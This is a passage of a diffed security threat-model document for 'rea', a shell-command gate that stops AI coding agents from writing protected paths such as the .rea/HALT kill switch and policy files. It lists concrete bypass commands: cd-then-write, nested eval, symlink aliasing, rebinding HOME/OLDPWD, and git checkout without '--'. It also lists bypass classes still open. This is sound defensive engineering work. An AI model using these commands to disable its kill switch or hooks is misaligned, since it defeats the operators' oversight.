new detectZip dispatcher (zip OUTPUT.zip [files...]).
|
|
877
|
+
(f) F12-6 P1: cmake -E utility surface — rm/remove/rename/
|
|
878
|
+
copy/copy_if_different/copy_directory/touch/remove_directory/
|
|
879
|
+
create_symlink/create_hardlink/make_directory all slipped past
|
|
880
|
+
pre-fix. Round-12 fix: new detectCmake with per-subcommand
|
|
881
|
+
argv shapes (cp-shape, mv-shape, variadic, second-positional).
|
|
882
|
+
(g) F12-7 P1: mkfifo / mknod create special files at protected
|
|
883
|
+
paths; no dispatchers existed. Round-12 fix: new detectMkfifo
|
|
884
|
+
(variadic) and detectMknod (NAME is first bare positional).
|
|
885
|
+
(h) F12-8 P1: find write-predicates -fls / -fprint / -fprintf
|
|
886
|
+
not in detectFind. Round-12 fix: scan for these predicates
|
|
887
|
+
and emit FILE as destructive write target (-fprintf consumes
|
|
888
|
+
TWO args). (i) F12-9 P2 false-positive regression: detectUnzip
|
|
889
|
+
emitted dynamic unresolvable for read-only flags `-p` (extract
|
|
890
|
+
to stdout), `-l/-Z/-t/-v/-z` (list/test/verbose/comment).
|
|
891
|
+
Round-12 fix: early-return ALLOW from detectUnzip when any
|
|
892
|
+
read-only flag (or cluster char) present. Class W (round-12
|
|
893
|
+
closures — 173 positives + 18 negatives) pins the closure.
|
|
894
|
+
- **cwd-relative-write kill-switch defeat** (helix-024 F1 — P1
|
|
895
|
+
closed in 0.23.1). `cd .rea && echo > HALT`,
|
|
896
|
+
`cd .husky && echo > pre-push`, `(cd .rea && echo > HALT)`,
|
|
897
|
+
`pushd .rea && echo > HALT`, `echo x | (cd .rea && tee HALT)`,
|
|
898
|
+
`p=.rea; cd $p && echo > HALT` all defeated 0.23.0. Pre-fix the
|
|
899
|
+
walker emitted only the relative redirect target (`HALT`); the
|
|
900
|
+
scanner normalized `HALT` against REA_ROOT and got `HALT`,
|
|
901
|
+
which doesn't match `.rea/HALT`. The cd was structurally
|
|
902
|
+
invisible — the walker source explicitly documented this limit.
|
|
903
|
+
Closure: new `detectCwdChangeIntoProtected` post-walker pass
|
|
904
|
+
scans the AST a second time for `cd`/`pushd` CallExprs and
|
|
905
|
+
emits a synthetic `cwd_protected_unresolvable` (literal target
|
|
906
|
+
— scanner runs the protected-prefix test with
|
|
907
|
+
`forceDirSemantics: true`) or `cwd_dynamic_with_writes_unresolvable`
|
|
908
|
+
(dynamic target — refuse on uncertainty) under a four-rule
|
|
909
|
+
refined predicate (round-14 codex P1 over-correction fix,
|
|
910
|
+
tightened in round-15 closure below):
|
|
911
|
+
(1) writes must be in-scope of the cd (sequential successors
|
|
912
|
+
in the same StmtList, or BinaryCmd.Y subtree of cd's BinaryCmd.X,
|
|
913
|
+
or nested compound stmts of those — NOT unrelated parallel
|
|
914
|
+
stmts); (2) writes must be bare-relative path-shape (absolute /
|
|
915
|
+
tilde / outside-root sentinels are unaffected by cwd); (3)
|
|
916
|
+
dynamic cd with a known-safe source is treated as ALLOW. The
|
|
917
|
+
known-safe set is intentionally narrow: NO env-var name
|
|
918
|
+
qualifies (round-15 P1 closure — `$HOME`/`$PWD`/`$OLDPWD` are
|
|
919
|
+
rebindable via inline assignment-prefix or parent-shell export,
|
|
920
|
+
and `$OLDPWD` tracks any previous cd including into protected
|
|
921
|
+
dirs); the only ParamExp source that is known-safe is a for-iter
|
|
922
|
+
variable bound to all-literal-non-protected Items. Known-safe
|
|
923
|
+
cmdsubst sources are `$(pwd)` and `$(git rev-parse <flag>)`
|
|
924
|
+
with flag in `{--show-toplevel, --show-cdup,
|
|
925
|
+
--show-superproject-working-tree}` — flags that resolve to
|
|
926
|
+
absolute paths or paths stepping OUT of cwd. `$(git rev-parse
|
|
927
|
+
--show-prefix)` is NOT known-safe (round-15 P1 closure — it
|
|
928
|
+
returns the cwd-relative path INSIDE the toplevel, so when the
|
|
929
|
+
agent is already in `.rea/` it returns `.rea/`). (4) dynamic cd
|
|
930
|
+
without bare-relative writes in scope emits nothing. Caught:
|
|
931
|
+
literal protected cd + bare-relative writes in any nested scope,
|
|
932
|
+
dynamic cd with unknown / env-var / show-prefix source +
|
|
933
|
+
bare-relative write in scope. Accepted false-negatives
|
|
934
|
+
(out of scope for hotfix, tracked for 0.24.0):
|
|
935
|
+
`cd $(echo .rea)` cmdsubst-resolved literals,
|
|
936
|
+
`alias evil="..."; evil` alias-then-invoke, for-iter loops
|
|
937
|
+
whose Items list is a cmdsubst.
|
|
938
|
+
- **doubly/N-nested eval bypass** (helix-024 F2 — P1 closed in
|
|
939
|
+
0.23.1). `eval "eval \"echo > .rea/HALT\""` defeated 0.23.0.
|
|
940
|
+
Pre-fix `detectEval` re-parsed exactly one level. The outer DQ-
|
|
941
|
+
significant escapes (`\"`) survived as literal backslash-quote
|
|
942
|
+
pairs into the joined inner string, corrupting the second-
|
|
943
|
+
level redirect target (`.rea/HALT\"`) so it didn't match the
|
|
944
|
+
protected list. Same shape as the helix-022 #3 nested-bash-c
|
|
945
|
+
DQ-escape bypass — `unshellEscape` collapses one level of DQ-
|
|
946
|
+
escapes before re-parse. Closure: two-part fix. (1)
|
|
947
|
+
unshellEscape the inner string before re-parsing in detectEval
|
|
948
|
+
(parity with detectNestedShell). (2) New `EVAL_DEPTH_CAP = 8`
|
|
949
|
+
counter mirroring NESTED_SHELL_DEPTH_CAP; past the cap the
|
|
950
|
+
walker emits a synthetic dynamic detection. Eval and bash -c
|
|
951
|
+
use SEPARATE counters so a heavy mix doesn't exhaust one
|
|
952
|
+
budget through the other. Single-level `eval "echo > .rea/
|
|
953
|
+
HALT"` continues to BLOCK (no regression).
|
|
954
|
+
- **symlink-alias-write kill-switch defeat** (helix-024 F3 — P1
|
|
955
|
+
closed in 0.23.1). `ln -sf .rea/HALT /tmp/_x && echo y > /tmp/
|
|
956
|
+
_x` exited 0 in 0.23.0. The static walker doesn't track
|
|
957
|
+
filesystem state across statements; the first statement stages
|
|
958
|
+
a symlink whose target is protected, the second writes through
|
|
959
|
+
the link. Neither token in isolation references a protected
|
|
960
|
+
write target — `ln`'s SRC was just a positional, DEST was
|
|
961
|
+
unprotected. Closure: detectLn emits a synthetic
|
|
962
|
+
`ln_to_protected_unresolvable` detection on every SRC positional
|
|
963
|
+
in both `ln SRC DEST` and `ln -t DEST_DIR SRC1 ...` forms. The
|
|
964
|
+
detection carries `isDestructive: true` so protected-ancestry
|
|
965
|
+
matches bare-dir SRCs (`ln -s .rea /tmp/_x` aliases the .rea
|
|
966
|
+
directory). Dynamic SRC emits the dynamic form. Class X
|
|
967
|
+
(helix-024 closures — 234 positives + 16 negatives) pins all
|
|
968
|
+
three closures. Related class deferred to 0.24.0:
|
|
969
|
+
alias-then-invoke (`alias evil="echo > .rea/HALT"; evil`)
|
|
970
|
+
requires modeling shell aliases at AST time.
|
|
971
|
+
- **env-var rebind + `--show-prefix` cwd-eval bypass**
|
|
972
|
+
(helix-024 round-15 P1 — closed in 0.23.1). Round-14's
|
|
973
|
+
`detectCwdChangeIntoProtected` refined predicate ALLOWed dynamic
|
|
974
|
+
cd whose source was an env-var ParamExp from
|
|
975
|
+
`{HOME, PWD, OLDPWD}` or a cmdsubst from `git rev-parse
|
|
976
|
+
--show-prefix`. Both classes are attacker-controllable. (1) Env
|
|
977
|
+
vars rebind via inline assignment-prefix on the same simple
|
|
978
|
+
command (`HOME=.rea cd "$HOME" && echo > HALT`) and via
|
|
979
|
+
parent-shell exports across commands (`export HOME=.rea; cd
|
|
980
|
+
"$HOME" && echo > HALT`); `OLDPWD` automatically tracks any
|
|
981
|
+
previous cd, so a prior cd into a protected dir poisons later
|
|
982
|
+
`cd "$OLDPWD"`. (2) `git rev-parse --show-prefix` returns the
|
|
983
|
+
cwd-relative path INSIDE the toplevel; when the agent's cwd is
|
|
984
|
+
already `.rea/`, `cd "$(git rev-parse --show-prefix)" && echo
|
|
985
|
+
> HALT` lands inside `.rea/` with a `HALT` write target that
|
|
986
|
+
resolves against `.rea/HALT`. Closure: empty `KNOWN_SAFE_VARS`
|
|
987
|
+
in `isParamExpKnownSafe` (no env-var name is statically safe;
|
|
988
|
+
the for-iter carve-out remains because Items literals are
|
|
989
|
+
statically checked); drop `--show-prefix` from the
|
|
990
|
+
`isCmdSubstKnownSafe` FLAGS allow-list (the remaining flags
|
|
991
|
+
`--show-toplevel`, `--show-cdup`,
|
|
992
|
+
`--show-superproject-working-tree` resolve to absolute paths or
|
|
993
|
+
paths stepping OUT of cwd — never INTO it). Class X corpus
|
|
994
|
+
rehomes: 3 fixtures moved from R14_ALLOW to R14_BLOCK
|
|
995
|
+
(`cd "$HOME"` / `cd "$OLDPWD"` / `pushd "$HOME"` with bare
|
|
996
|
+
writes), 4 new BLOCK fixtures pin the round-15 PoCs
|
|
997
|
+
(`HOME=.rea cd "$HOME"`, `PWD=.rea cd "$PWD"`,
|
|
998
|
+
`cd "$(git rev-parse --show-prefix)"`,
|
|
999
|
+
`export HOME=.rea; cd "$HOME"`). Single-level eval, ln-source-
|
|
1000
|
+
protected, and the literal `cd .rea` path remain unchanged. As
|
|
1001
|
+
a side improvement under round-15 P3, `.github/workflows/` is
|
|
1002
|
+
added to the historical default protected list so consumers
|
|
1003
|
+
without an explicit `policy.blocked_paths` entry still refuse
|
|
1004
|
+
Bash-tier writes to CI workflows; the path is intentionally NOT
|
|
1005
|
+
a kill-switch invariant — operators may relax it via
|
|
1006
|
+
`policy.protected_paths_relax`. Round-16 closure (helix-024
|
|
1007
|
+
hotfix continued, sibling threat class to round-15 F1) extends
|
|
1008
|
+
the refuse-on-uncertainty path to bare `cd` (defaults cwd to
|
|
1009
|
+
`$HOME`), `cd -L` / `cd -P` (flag-only, also default to
|
|
1010
|
+
`$HOME`), `cd -` (reverts to `$OLDPWD`), and `popd` (reverts
|
|
1011
|
+
to dir-stack head): all four forms emit no positional after
|
|
1012
|
+
flag-skip and previously fell through with no detection — they
|
|
1013
|
+
now run the same in-scope bare-relative-write check as the
|
|
1014
|
+
dynamic-target branch and emit
|
|
1015
|
+
`cwd_dynamic_with_writes_unresolvable` if a bare-relative write
|
|
1016
|
+
is in scope. 5 new R16_BLOCK fixtures + 4 R16-shape negatives
|
|
1017
|
+
added to Class X corpus.
|
|
1018
|
+
Round-17 closure (helix-024 hotfix continued, P1 + P2 + P3 +
|
|
1019
|
+
P3-doc — control-flow walker gap, NOT a predicate weakness): the
|
|
1020
|
+
round-14/15/16 walker visited a conditional's Cond and Body as
|
|
1021
|
+
separate scopes via `walkScopeForCwd`. A `cd` inside the Cond
|
|
1022
|
+
therefore had a single-command scope with no successors, never
|
|
1023
|
+
collected the body's writes as downstream, and never emitted —
|
|
1024
|
+
even though bash semantics keep the cwd change in the current
|
|
1025
|
+
shell so it persists into the Body when the cond is truthy AND
|
|
1026
|
+
past the conditional into post-stmt siblings. Closure: thread an
|
|
1027
|
+
`extraDownstream` parameter through `walkScopeForCwd` →
|
|
1028
|
+
`classifyCdInStmt` → `collectCdSitesInStmt` /
|
|
1029
|
+
`collectCdSitesInBinaryX`. When `descendCmdScopes` enters an
|
|
1030
|
+
IfClause/WhileClause/UntilClause, the Cond walk receives `[...
|
|
1031
|
+
body, ...post-stmt-siblings]` as carriers; the Body walk receives
|
|
1032
|
+
`[...post-stmt-siblings]`. Subshell stays cwd-isolated (forks a
|
|
1033
|
+
child shell) so its inner walk does NOT inherit parent siblings.
|
|
1034
|
+
The same closure adds explicit `TimeClause` / `CoprocClause`
|
|
1035
|
+
cases to `descendCmdScopes` (descend into the wrapped Stmt with
|
|
1036
|
+
carriers) and a TimeClause/CoprocClause unwrap in
|
|
1037
|
+
`collectCdSitesInBinaryX` so `time cd .rea && echo > HALT`
|
|
1038
|
+
reaches the cd site. `pushd` no-positional / `pushd -N` /
|
|
1039
|
+
`pushd +N` already BLOCK incidentally via the round-16 fallback
|
|
1040
|
+
(runtime-determined dir-stack manipulation refused on uncertainty),
|
|
1041
|
+
but R17 P3 pins the verdict with three explicit fixtures so a
|
|
1042
|
+
future predicate relaxation cannot silently re-open the bypass.
|
|
1043
|
+
12 new R17_BLOCK fixtures + 3 R17_ALLOW negatives added to Class
|
|
1044
|
+
X corpus, including the pragmatic-bound ALLOW for `pushd && cat
|
|
1045
|
+
README.md` (no bare-relative WRITE in scope), `if cd /tmp; then
|
|
1046
|
+
echo > log; fi` (literal non-protected cd target — protected-
|
|
1047
|
+
prefix test ALLOWS), and `if cd .rea; then cat HALT; fi` (read-
|
|
1048
|
+
only body — predicate requires a WRITE).
|
|
1049
|
+
|
|
1050
|
+
### 8.3 Bypass classes still possible
|
|
1051
|
+
|
|
1052
|
+
- **`mvdan-sh@0.10.1` deprecation advisory** (helix-024 F4 — P2
|
|
1053
|
+
acknowledged residual, surfaced 2026-05-04). The 0.23.0 upgrade
|
|
1054
|
+
introduced `mvdan-sh@0.10.1` as a transitive runtime dependency
|
|
1055
|
+
at the security boundary. The package is the JavaScript port of
|
|
1056
|
+
mvdan's Go shell parser and is upstream-deprecated per
|
|
1057
|
+
https://github.com/mvdan/sh/issues/1145 (Go-original is
|
|
1058
|
+
actively maintained; the JS port is on hold). The deprecation
|
|
1059
|
+
is a code-freeze, not a removal. Mitigations already in place:
|
|
1060
|
+
(1) integrity hash pinned in pnpm-lock.yaml, (2) the project
|
|
1061
|
+
fails closed on parser anomalies (parse errors → refuse on
|
|
1062
|
+
uncertainty), (3) Class O exhaustiveness contract pins the
|
|
1063
|
+
walker against any latent field-gap. A future mvdan-sh
|
|
1064
|
+
migration / replacement is out-of-scope for the helix-024
|
|
1065
|
+
hotfix; tracked for 0.24.0 evaluation. Listed as still-possible
|
|
1066
|
+
rather than structurally-impossible because the security model
|
|
1067
|
+
binds rea to a deprecated parser at the AST boundary.
|
|
1068
|
+
- **`@bookedsolid/rea` package-tier supply-chain compromise** (codex
|
|
1069
|
+
round 5 F5 — P1/P3 acknowledged residual). The bash-tier shim's
|
|
1070
|
+
CLI-resolution sandbox check (codex round 4 #2 + round 5 F2)
|
|
1071
|
+
defeats node_modules-symlink-out and workspace-bin hijack. It does
|
|
1072
|
+
NOT defeat an attacker who can write a forged
|
|
1073
|
+
`node_modules/@bookedsolid/rea/dist/cli/index.js` *and* a matching
|
|
1074
|
+
`node_modules/@bookedsolid/rea/package.json` with `name ===
|
|
1075
|
+
"@bookedsolid/rea"` directly inside the project's `node_modules/`.
|
|
1076
|
+
Such an attacker has already compromised the package install
|
|
1077
|
+
pipeline (e.g. via a compromised lockfile / dependency-confusion
|
|
1078
|
+
attack / npm registry compromise). At that level the attacker can
|
|
1079
|
+
also forge any other dependency the agent uses, so hook-tier defense
|
|
1080
|
+
is past — the trust boundary is the `npm install` provenance check
|
|
1081
|
+
(npm provenance + manifest verification) rather than the bash gate.
|
|
1082
|
+
Hardening (opt-in): operators may set `policy.review.cli_sha256: <hex>`
|
|
1083
|
+
in `.rea/policy.yaml` and the shim will refuse if the resolved CLI's
|
|
1084
|
+
SHA-256 does not match. Defaults to unset; documented as an opt-in
|
|
1085
|
+
belt-and-braces measure rather than a structural defense (see
|
|
1086
|
+
`docs/architecture/bash-scanner.md` for the full rationale).
|
|
1087
|
+
- **`git checkout REVISION PATH` and `git restore --source=REVISION
|
|
1088
|
+
PATH` without the POSIX `--` argv separator** (codex round 9 F3 —
|
|
1089
|
+
accepted false negative since 0.22.0). When an attacker invokes
|
|
1090
|
+
`git checkout main .rea/HALT` (or `git restore --source=HEAD~1
|
|
1091
|
+
.rea/policy.yaml`), git's pre-`--` argv shape is structurally
|
|
1092
|
+
ambiguous between "REVISION PATH" and "PATH...". The `detectGit`
|
|
1093
|
+
walker conservatively treats positionals after the subcommand as
|
|
1094
|
+
destructive-overwrite targets ONLY when `--` is present, because
|
|
1095
|
+
disambiguation requires a runtime ref-existence check that the
|
|
1096
|
+
static walker cannot perform without filesystem I/O. Workaround:
|
|
1097
|
+
the kill-switch invariants for protected files (`.rea/HALT`,
|
|
1098
|
+
`.rea/policy.yaml`, `.claude/settings.json`, etc.) are still caught
|
|
1099
|
+
by the symlink-resolution layer in `protected-paths-bash-gate.sh`
|
|
1100
|
+
at file-write time when git actually opens the destination for
|
|
1101
|
+
write — the bash-scanner's static layer is one of multiple
|
|
1102
|
+
enforcement points. Pin: 0.24.0 milestone for a comprehensive fix
|
|
1103
|
+
(likely a conservative refusal whenever the first positional
|
|
1104
|
+
matches a known git-revspec shape AND following positionals exist).
|
|
1105
|
+
- glob expansion in argv-based commands (`chmod +x bin/*.sh` on a
|
|
1106
|
+
filesystem where `bin/.rea` exists). Glob detection is scoped to
|
|
1107
|
+
redirect-form targets only because argv-globs in legitimate code
|
|
1108
|
+
are common. Future: enumerate filesystem-level glob matches.
|
|
1109
|
+
- awk `-f script-file` body. We currently emit a dynamic detection
|
|
1110
|
+
(refuse on uncertainty). Future: read + scan the file.
|
|
1111
|
+
- semantic obfuscation via `${!ind}` indirect expansion, `read -p`
|
|
1112
|
+
prompts, computed-property attacks in interpreter payloads that
|
|
1113
|
+
evade the flat-scan heuristic. These are parse-correct and the
|
|
1114
|
+
detector is best-effort.
|
|
1115
|
+
- WASM `sh-syntax` migration risk: parser bugs in the new library
|
|
1116
|
+
could reopen bypass classes. Mitigated by the corpus fixture
|
|
1117
|
+
suite (every closed bypass replays as a positive regression
|
|
1118
|
+
test).
|
|
1119
|
+
- **Round-13 deferred to 0.24.0** (utility-enumeration completeness
|
|
1120
|
+
— same shape as round 12; convergence at this tier is asymptotic
|
|
1121
|
+
per codex's explicit assessment):
|
|
1122
|
+
1. **PHP indirect-callable shell-out** —
|
|
1123
|
+
`array_map("system", [...])`, `call_user_func("system", ...)`,
|
|
1124
|
+
`eval("system(...);")`, variable-bound callable
|
|
1125
|
+
`$f = "system"; $f(...)`. Round 12 closed direct calls;
|
|
1126
|
+
indirect callable forms remain.
|
|
1127
|
+
2. **vim/emacs editor exec re-parse seam** — `vim -c "!cmd"`,
|
|
1128
|
+
`vim -c "w PATH"`, `vim -c "source PATH"`, `emacs --eval
|
|
1129
|
+
"(shell-command \"...\")"`, `emacs --eval "(delete-file
|
|
1130
|
+
\"...\")"`. No vim/emacs dispatcher in 0.23.0.
|
|
1131
|
+
3. **Standalone compression utilities** — `xz -o FILE`,
|
|
1132
|
+
`zstd -o FILE`, `lz4 INPUT FILE`, `lzma -o FILE`. Round 12
|
|
1133
|
+
closed tar/zip/7z/cpio/pax create-direction; standalone
|
|
1134
|
+
compression family adjacent.
|
|
1135
|
+
4. **Image-builder utilities** — `mksquashfs INPUT OUTPUT`,
|
|
1136
|
+
`genisoimage -o OUTPUT`, `mkisofs -o OUTPUT`, `xorriso
|
|
1137
|
+
-outdev OUTPUT`. CI/build pipelines use these.
|
|
1138
|
+
5. **`7zz` Linux-canonical 7zip alias** — `detect7z` only fires
|
|
1139
|
+
on `7z`; the official Linux package binary is `7zz`.
|
|
1140
|
+
6. **Python argv-form subprocess** — `subprocess.Popen(['rm',
|
|
1141
|
+
'...'])`, `subprocess.run(['rm', '...'])` etc. without
|
|
1142
|
+
`shell=True`. Round 3 F5 closed `shell=True` form;
|
|
1143
|
+
argv-list form still allows.
|
|
1144
|
+
7. **vim ex-mode literal-path write** (P2) — `vim -c "w PATH"`
|
|
1145
|
+
writes literally with PATH in argv, regex-level miss
|
|
1146
|
+
independent of the broader `-c` re-parse seam.
|
|
1147
|
+
- **Denylist scanner is structurally limited** (acknowledged by
|
|
1148
|
+
codex round 4 and reaffirmed by codex round 13: "convergence on
|
|
1149
|
+
enumeration completeness is asymptotic — every round will probably
|
|
1150
|
+
find more"). A denylist enumerates the destructive shapes the
|
|
1151
|
+
scanner knows. Novel shapes (interpreters or utilities not yet
|
|
1152
|
+
modeled, language constructs we haven't seen) can in principle
|
|
1153
|
+
bypass until added. Defense in depth:
|
|
1154
|
+
1. mvdan-sh AST parsing eliminates an entire class of regex/
|
|
1155
|
+
segmenter mistakes.
|
|
1156
|
+
2. Comprehensive walker dispatchers per known destructive utility +
|
|
1157
|
+
per known shell-out + per known interpreter API.
|
|
1158
|
+
3. Adversarial corpus generators span the parameter cross-product
|
|
1159
|
+
so generators produce shapes Codex hasn't visited.
|
|
1160
|
+
4. Per-round Codex review surfaces gaps before release; the
|
|
1161
|
+
convergence ladder
|
|
1162
|
+
(round 1 → round 2 → round 3 → round 4 → round 5 ...) is the
|
|
1163
|
+
audit trail.
|
|
1164
|
+
5. Fail-closed defaults: dynamic targets always block.
|
|
1165
|
+
An allowlist scanner ("only known-safe commands pass") would close
|
|
1166
|
+
this class structurally but is incompatible with the rea use case
|
|
1167
|
+
(agentic workflows need arbitrary bash access).
|
|
1168
|
+
|
|
1169
|
+
### 8.4 Test surface
|
|
1170
|
+
|
|
1171
|
+
The fixture corpus at
|
|
1172
|
+
`__tests__/hooks/bash-tier-corpus.test.ts` (≥185 entries) and
|
|
1173
|
+
`__tests__/hooks/bash-tier-corpus-round2.test.ts` (≥186 entries,
|
|
1174
|
+
codex round 2 bypass-class fixtures) locks every documented bypass
|
|
1175
|
+
class as a regression-positive test.
|
|
1176
|
+
The walker unit tests at `__tests__/hooks/bash-scanner/walker.test.ts`
|
|
1177
|
+
pin the parser-emitted RedirOperator codes (codex round 1 F-33) so a
|
|
1178
|
+
parser-library bump that re-numbers them fails LOUDLY. The verdict-
|
|
1179
|
+
shape snapshot at `__tests__/hooks/bash-scanner/verdict-shape.test.ts`
|
|
1180
|
+
locks the wire format for the bash shim consumers.
|
|
1181
|
+
|
|
1182
|
+
The cross-product corpus at
|
|
1183
|
+
`__tests__/hooks/bash-scanner/adversarial-corpus.test.ts` runs ≥7700
|
|
1184
|
+
fixtures across 18 classes (A–P plus extensions). Coverage assertion:
|
|
1185
|
+
≥3000 positive (must-block) and ≥1000 negative (must-allow) fixtures.
|
|
1186
|
+
|
|
1187
|
+
The Class O exhaustiveness contract test at
|
|
1188
|
+
`__tests__/hooks/bash-scanner/walker-exhaustiveness.contract.test.ts`
|
|
1189
|
+
pins the walker reach across every Word-bearing AST position
|
|
1190
|
+
mvdan-sh's parser populates. Round-8 tightened the acceptance to
|
|
1191
|
+
path-explicit-by-default; opt-in `acceptDynamic` per row is the only
|
|
1192
|
+
way to accept a `dynamic: true` write as proof-of-reach.
|
|
1193
|
+
|
|
1194
|
+
The bash-shim subprocess sampling at
|
|
1195
|
+
`adversarial-corpus.test.ts > "bash shim subprocess sampling"`
|
|
1196
|
+
spawns the actual hook script under a clean env across 100
|
|
1197
|
+
deterministically-sampled fixtures, parses verdict JSON, and
|
|
1198
|
+
cross-checks against in-process scan. Catches drift between the
|
|
1199
|
+
in-process verdict and what the shim's JSON verifier + 4-tier
|
|
1200
|
+
resolver chain actually returns.
|
|
1201
|
+
|
|
1202
|
+
### 8.5 Defense in depth
|
|
1203
|
+
|
|
1204
|
+
The bash gate is one layer. The full defensive stack:
|
|
1205
|
+
|
|
1206
|
+
1. **Parser AST** (`mvdan-sh@0.10.1`) — eliminates regex/segmenter
|
|
1207
|
+
tokenization mistakes.
|
|
1208
|
+
2. **Walker** (`syntax.Walk`-based deny-by-default traversal +
|
|
1209
|
+
`recurseParamExpSlice` for Walk gaps) — visits every node type;
|
|
1210
|
+
no Cmd-kind branch can silently drop a field.
|
|
1211
|
+
3. **Per-utility dispatchers** — comprehensive coverage of cp, mv,
|
|
1212
|
+
sed, dd, tee, install, ln, awk, ed, ex, find, xargs, node,
|
|
1213
|
+
python, ruby, perl, tar, rsync, curl, wget, shred, eval, git,
|
|
1214
|
+
patch, sort, shuf, gpg, split, trap, bash/sh/zsh/dash/ksh.
|
|
1215
|
+
4. **Interpreter scanners** — write-API tokens for node fs, python
|
|
1216
|
+
os/shutil/subprocess, ruby Pathname/FileUtils, perl unlink/rename;
|
|
1217
|
+
shell-out re-parse for `system`/`subprocess.run shell=True`/`qx`/
|
|
1218
|
+
backticks.
|
|
1219
|
+
5. **DQ-escape parity** — `unshellEscape` collapses all 5 DQ-significant
|
|
1220
|
+
escapes (round-8) so re-parser sees the same syntax tree as bash.
|
|
1221
|
+
6. **Symlink resolver** — visited-set + depth cap (32); refuses on
|
|
1222
|
+
cycle/cap; macOS `/var` ↔ `/private/var` aliasing handled by
|
|
1223
|
+
`rea_resolved_relative_form` (helix-021).
|
|
1224
|
+
7. **2-tier sandboxed CLI resolver** — only
|
|
1225
|
+
`node_modules/@bookedsolid/rea/dist/cli/index.js` and
|
|
1226
|
+
`dist/cli/index.js` accepted; `realpath` containment check
|
|
1227
|
+
refuses any escape from `CLAUDE_PROJECT_DIR`.
|
|
1228
|
+
8. **Verdict JSON verifier** — shim re-parses CLI output via
|
|
1229
|
+
`node -e` and cross-checks exit code ↔ verdict (round-1 F-3).
|
|
1230
|
+
9. **Cross-product corpus** (Classes A–P) — ≥7700 fixtures span the
|
|
1231
|
+
parameter space so generators produce shapes the round-by-round
|
|
1232
|
+
manual review hadn't visited.
|
|
1233
|
+
10. **Class O exhaustiveness contract** — pins every Word-bearing
|
|
1234
|
+
AST position so mvdan-sh upgrades cannot silently introduce
|
|
1235
|
+
Walk-skip bypasses.
|
|
1236
|
+
11. **Codex adversarial review** — every release goes through
|
|
1237
|
+
`/codex-review` before merge; convergence ladder is the audit
|
|
1238
|
+
trail. 0.23.0 round count: 8 (and counting).
|
|
1239
|
+
12. **Middleware audit log** — every tool invocation is hash-chained
|
|
1240
|
+
in `.rea/audit.jsonl` (append-only, tamper-evident).
|
|
1241
|
+
13. **Codex push-gate** (0.11.0+) — pre-push stateless review by
|
|
1242
|
+
GPT-5.4 (codex-auto-review) catches semantic concerns the static
|
|
1243
|
+
scanner cannot reason about.
|
|
1244
|
+
14. **Husky 9 hook chain** — `commit-msg`, `pre-push`, `pre-commit`
|
|
1245
|
+
register every hook in the package; consumers can extend via
|
|
1246
|
+
`.husky/{commit-msg,pre-push,pre-commit}.d/*` (helix-018 Option B).
|
|
1247
|
+
|
|
1248
|
+
A bypass requires defeating multiple layers simultaneously. The
|
|
1249
|
+
trust boundary between this stack and the rest of the system is
|
|
1250
|
+
package-tier integrity (npm provenance + manifest verification).
|
|
1251
|
+
|
|
1252
|
+
### 8.6 Out of scope
|
|
1253
|
+
|
|
1254
|
+
The bash gate explicitly does NOT defend against:
|
|
1255
|
+
|
|
1256
|
+
- **Kernel-level / LD_PRELOAD / ptrace attacks.** The OS kernel and
|
|
1257
|
+
loader are trusted. An attacker with code execution at that tier
|
|
1258
|
+
bypasses every userland defense.
|
|
1259
|
+
- **Network-tier MITM during package install.** rea trusts the npm
|
|
1260
|
+
registry (with provenance verification) and the system's TLS root
|
|
1261
|
+
store. A compromised TLS chain at `npm install` time gives the
|
|
1262
|
+
attacker the same authority as the package itself.
|
|
1263
|
+
- **Supply-chain compromise of `@bookedsolid/rea` on npm.** A signed
|
|
1264
|
+
release with malicious code defeats the gate because the gate IS
|
|
1265
|
+
the malicious code. Mitigation is npm provenance + manifest
|
|
1266
|
+
verification + (opt-in) `policy.review.cli_sha256`. See §8.3.
|
|
1267
|
+
- **Out-of-band file modifications.** rea gates Bash tool calls and
|
|
1268
|
+
Write/Edit/MultiEdit Write-tier hooks. Filesystem changes initiated
|
|
1269
|
+
outside the harness (user editing files directly, language server
|
|
1270
|
+
edits, other processes) are not gated.
|
|
1271
|
+
- **Read-side policy leaks.** The bash gate concerns WRITES. Reading
|
|
1272
|
+
`.rea/policy.yaml` is allowed by default — the policy is checked-in
|
|
1273
|
+
and visible. `env-file-protection.sh` handles `.env*` reads at the
|
|
1274
|
+
Write tier; bash-tier coverage of `.env*` reads is via
|
|
1275
|
+
`dependency-audit-gate.sh` and the segmenter for those forms.
|
|
1276
|
+
- **Attacker-controlled PATH at scanner runtime.** If `rea` resolves
|
|
1277
|
+
to an attacker binary on PATH, the gate is defeated. Production
|
|
1278
|
+
deployments pin PATH via the harness; `rea doctor` verifies PATH
|
|
1279
|
+
integrity at install time but does not enforce it at runtime.
|